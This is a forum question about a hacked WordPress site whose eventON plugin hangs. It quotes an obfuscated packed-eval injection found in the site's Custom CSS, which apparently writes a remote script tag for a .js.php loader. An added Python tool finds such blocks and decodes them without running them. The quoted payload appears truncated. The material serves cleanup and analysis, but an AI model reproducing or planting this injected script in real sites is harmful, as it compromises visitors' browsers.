
errors - eventON plugin AJAX call triggers website crash


The eventON event listing plugin causes our website to crash when switching between months. The browser indicates that it is trying to load the site, but nothing ever appears. The plugin is inserted using this shortcode: [add_eventon_list show_limit="yes" event_count="10" hide_past="yes" event_type="1082" accord="yes" ]. The AJAX request through WordPress returns a 200 response, so the script seems to have worked. The AJAX function's URL seems to be what is causing the issue. I have reviewed the plugin's register and localize script code, but nothing is standing out to me. No other JavaScript errors are being displayed in the console.

Website:

wp_register_script('evcal_ajax_handle', $eventon->assets_path. 'js/eventon_script.js', array('jquery'), $eventon->version ,true );
wp_localize_script( 
    'evcal_ajax_handle', 
    'the_ajax_script', 
        array( 
            'ajaxurl' => admin_url( 'admin-ajax.php' ) , 
            'postnonce' => wp_create_nonce( 'eventon_nonce' )
        )
);

Firefox console:

  • SyntaxError: identifier starts immediately after numeric literal
  • Blocked loading mixed active content .js.php

I understand that this may be a mixed content issue as our website is HTTPS, but other child sites using the same code via WP Network on the same domain are working with no errors. I am not sure why browsers are using an IP address to load jQuery via a PHP script.

This is the offending code as highlighted by Sucuri:

Welcome eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))

to Custom CSS!

I have tried using find and grep commands to find the offending code using SSH, but so far no luck. Does anyone have suggestions for tracking down this type of hack?

Chrome console:

  • Uncaught SyntaxError: Invalid or unexpected token
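On the question of tracking down this kind of injection, here is an added example (not part of the original post or of the plugin's code): a Python script that finds `eval(function(p,a,c,k,e,d)` packed blocks in files or an exported SQL dump and decodes them statically, without running them, to show what they write into the page. It assumes the payload may sit in stored content rather than in files on disk (the "Custom CSS" text around the quoted line hints at that); `unpack`, `scan_tree` and the dump folder are illustrative names, and `SAMPLE` is the packed line quoted in the question.

```python
import os
import re

# Signature of the p,a,c,k,e,d packer: captures payload, radix, word count, word list.
PACKED = re.compile(
    r"eval\(function\(p,a,c,k,e,d\).*?\}\('((?:\\.|[^'\\])*)',(\d+),(\d+),"
    r"'((?:\\.|[^'\\])*)'\.split\('\|'\)", re.S)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def encode(n, radix):
    """Token the packer assigns to word index n (radix 2..62)."""
    out = ""
    while True:
        n, r = divmod(n, radix)
        out = DIGITS[r] + out
        if n == 0:
            return out

def unpack(text):
    """Return the decoded script for every packed block in text (never executes it)."""
    decoded = []
    for m in PACKED.finditer(text):
        payload, radix, count = m.group(1), int(m.group(2)), int(m.group(3))
        if not 2 <= radix <= 62:
            continue  # outside what this decoder handles
        words = m.group(4).split("|")
        # An empty dictionary slot means the token stands for itself, as in the packer.
        table = {encode(i, radix): words[i] or encode(i, radix)
                 for i in range(min(count, len(words)))}
        decoded.append(re.sub(r"\b\w+\b", lambda w: table.get(w.group(0), w.group(0)), payload))
    return decoded

def scan_tree(root):
    """Decode packed blocks in every file under root (wp-content, or a folder with an SQL dump)."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend((path, js) for js in unpack(fh.read()))
            except OSError:
                continue  # unreadable file: skip it
    return hits

# The packed line quoted in the question, unchanged.
SAMPLE = r'''eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))'''

if __name__ == "__main__":
    print(unpack(SAMPLE))
```

Escape sequences inside the payload (`\'`, `\\`) are left as written, so the decoded text is for reading, not for re-running.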